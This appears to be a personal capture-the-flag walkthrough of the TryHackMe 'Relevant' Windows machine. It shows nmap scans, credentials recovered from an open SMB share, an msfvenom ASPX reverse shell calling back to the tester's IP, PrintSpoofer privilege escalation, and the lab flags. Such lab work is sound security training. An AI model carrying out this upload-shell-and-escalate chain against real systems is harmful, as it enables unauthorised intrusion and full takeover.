Relevant

tags: vulnerableMachine

Scope of work

  • Black-box penetration test
  • The client has asked that you secure two flags (no location provided) as proof of exploitation:
      • User.txt
      • Root.txt
  • Any tools or techniques are permitted in this engagement
  • Locate and note all vulnerabilities found
  • Find and report ALL vulnerabilities (yes, there is more than one path to root)

Required report format

  • Executive summary
  • Vulnerabilities
  • Exploitation assessment
  • Remediation suggestions

Recon

python3 ../../deepScan.py 10.10.221.83
script is running. Author:meowhecker
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 11:59 CST
Nmap scan report for 10.10.221.83
Host is up (0.28s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-13T04:06:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2023-02-12T03:35:08
|_Not valid after:  2023-08-14T03:35:08
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2023-02-13T04:06:12+00:00
49663/tcp open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-02-13T04:06:15
|_  start_date: 2023-02-13T03:35:10
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-02-12T20:06:13-08:00

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   172.27 ms 10.17.0.1
2   ... 4
5   284.40 ms 10.10.221.83

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 451.86 seconds

Potentially vulnerable services

80: web (IIS)

445: SMB server

49663: second IIS instance ("IIS Windows Server") -> probably a test server

Brute-force web directories and files

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.43.201
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 14:10 CST
Nmap scan report for 10.10.43.201
Host is up (0.36s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.43.201\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.43.201\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.43.201\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.43.201\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 136.63 seconds

SMB login

smbclient //10.10.43.201/nt4wrksv

The share holds sensitive data:

-> passwords.txt

get passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Qm9iIC0gIVBAJCRXMHJEITEyMw== (Base64-encoded)

Decoded with https://www.asciitohex.com/:

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
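An added example (not from the original notes) that decodes the passwords.txt format shown above offline instead of pasting credentials into a web site: it skips the [Section] header, strictly base64-decodes each line, splits "name - password", and drops malformed lines. The file content is a constructed copy of what the share returned.

```python
import base64
import binascii

# Constructed copy of the share's passwords.txt as retrieved above.
PASSWORDS_TXT = """[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""

def decode_line(line):
    """Strict base64 decode of one entry; returns (name, password) or None if malformed."""
    try:
        raw = base64.b64decode(line, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not base64 (encoded != encrypted, but still reject junk)
    name, sep, password = raw.partition(" - ")
    if not sep or not name or not password:
        return None  # decoded fine but not in "name - password" form
    return name, password

def parse_passwords(text):
    """Parse the '[Section]' + one-base64-line-per-user format into {name: password}."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue  # blank line or section header such as [User Passwords - Encoded]
        entry = decode_line(line)
        if entry:
            creds[entry[0]] = entry[1]
    return creds
```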

==> DIRECTORY: http://10.10.43.201:49663/aspnet_client/   
--> Testing: http://10.10.43.201:49663/captcha             
--> Testing: http://10.10.43.201:49663/carbuyaction  

http://10.10.43.201:49663/aspnet_client/

Initial Access

We can infer that the SMB share directory is served by the IIS instance on port 49663, and that the directory actually exists.

Now we can attempt to upload a web shell in order to gain initial access.

http://10.10.43.201:49663/aspnet_client/

Based on the URL path (aspnet_client), the web application is likely ASP.NET running on IIS.

ASPX web shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.11.72 LPORT=443 -f aspx -o webShell.aspx

Trigger the web shell by requesting it in the browser.

Privilege Escalation


It appears the current user has the SeImpersonatePrivilege token enabled, which means token impersonation could be used to escalate privileges.

Upload the executable

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

Executing the exploit

PrintSpoofer64.exe -i -c cmd

powershell.exe

THM{fdk4ka34vk346ksxfr21tg789ktf45}

THM{1fk5kf469devly1gl320zafgl345pv}